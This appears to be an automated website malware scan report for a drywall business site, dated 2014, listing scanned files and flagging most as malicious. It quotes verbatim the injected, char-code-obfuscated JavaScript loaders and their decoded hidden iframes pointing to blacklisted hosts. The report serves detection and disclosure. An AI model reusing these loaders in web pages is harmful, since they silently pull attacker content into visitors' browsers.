Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frdrywall.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://frdrywall.com/ | 200 OK Content-Length: 6941 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: alias.jjbworks.com var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!97!108!105!97!115!46!106!106!98!119!111!114!107!115!46!99!111!109!47!97!110!97!108!121!116!105!99!115!46!112!104!112!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out); Decoded script: <iframe src="http://alias.jjbworks.com/analytics.php" width=0 height=0 frameborder=0></iframe> | ||
http://frdrywall.com/domain.js | 200 OK Content-Length: 17444 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: emails.surreyhill2.com var domain="frdrywall.com"; var sitevar="http://frdrywall.com/builder/resources/preloader_gallery/standard/site66wl.swf"; var siteinitialvar="http://frdrywall.com/builder/resources/preloader_gallery/standard/siteinitial66wl.swf"; var contentpathvar="http://frdrywall.com/"; var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!101!109!97!105!108!115!46!115!117!114!114!101!121!104!105!108!108 ...[3471 bytes skipped]... Decoded script: <iframe src="http://emails.surreyhill2.com/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborder=0></iframe><div id="idMyWait" style="visibility:hidden; position:fixed; top:45%; left:45%; border:5px solid gray; padding:40px; padding-top:10px; background:#fff; text-align:left;"&g ...[391 bytes skipped]... | ||
http://frdrywall.com/site.js | 200 OK Content-Length: 16361 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var introwidth ="980" ; var introheight = "890"; var randomnum = Math.round(10000*Math.random()); embedstring = '<EMBED src='+sitevar+'?siteinitialvar=' + siteinitialvar + '&contentpath='+contentpathvar+ '&urlvar=' + domain + '&randomnum=' + randomnum + ' quality=high scale="exactfit" AllowFullScreen="true" bgcolor=#000000 WIDTH=' + introwidth + ' HEIGHT='+introheight +' NAME="sitecube" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/ge Antivirus reports:
| ||
http://frdrywall.com/html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 20:35:52 GMT Location: http://frdrywall.com/html/ Server: Apache Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://frdrywall.com/html/ | 200 OK Content-Length: 13813 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: alias.jjbworks.com var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!97!108!105!97!115!46!106!106!98!119!111!114!107!115!46!99!111!109!47!97!110!97!108!121!116!105!99!115!46!112!104!112!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out); Decoded script: <iframe src="http://alias.jjbworks.com/analytics.php" width=0 height=0 frameborder=0></iframe> | ||
http://frdrywall.com/html/res/jquery.1.3.2.min.js | 200 OK Content-Length: 64082 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <body><script type="text/javascript">var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!101!109!97!105!108!115!46!115!117!114!114!101!121!104!105!108!108!50!46!99!111!109!47!105!110!46!99!103!105!63!100!101!102!97!117!108!116!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt Antivirus reports:
| ||
http://frdrywall.com/res/storetextdes.js | 404 Not Found Content-Length: 336 Content-Type: text/html | clean |
http://frdrywall.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://frdrywall.com/builder/index.php | 200 OK Content-Length: 4937 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: alias.jjbworks.com var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!97!108!105!97!115!46!106!106!98!119!111!114!107!115!46!99!111!109!47!97!110!97!108!121!116!105!99!115!46!112!104!112!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out); Decoded script: <iframe src="http://alias.jjbworks.com/analytics.php" width=0 height=0 frameborder=0></iframe> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: frdrywall.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 20:35:50 GMT
Accept-Ranges: bytes
ETag: "1b1d-4b37124bec100"
Server: Apache
Content-Length: 6941
Content-Type: text/html
Last-Modified: Tue, 06 Dec 2011 19:07:16 GMT
...6941 bytes of data.
GET / HTTP/1.1
Host: frdrywall.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 20:35:50 GMT
Accept-Ranges: bytes
ETag: "1b1d-4b37124bec100"
Server: Apache
Content-Length: 6941
Content-Type: text/html
Last-Modified: Tue, 06 Dec 2011 19:07:16 GMT
...6941 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: frdrywall.com
Referer: http://www.google.com/search?q=frdrywall.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: frdrywall.com
Referer: http://www.google.com/search?q=frdrywall.com
Result:
The result is similar to the first query. There are no suspicious redirects found.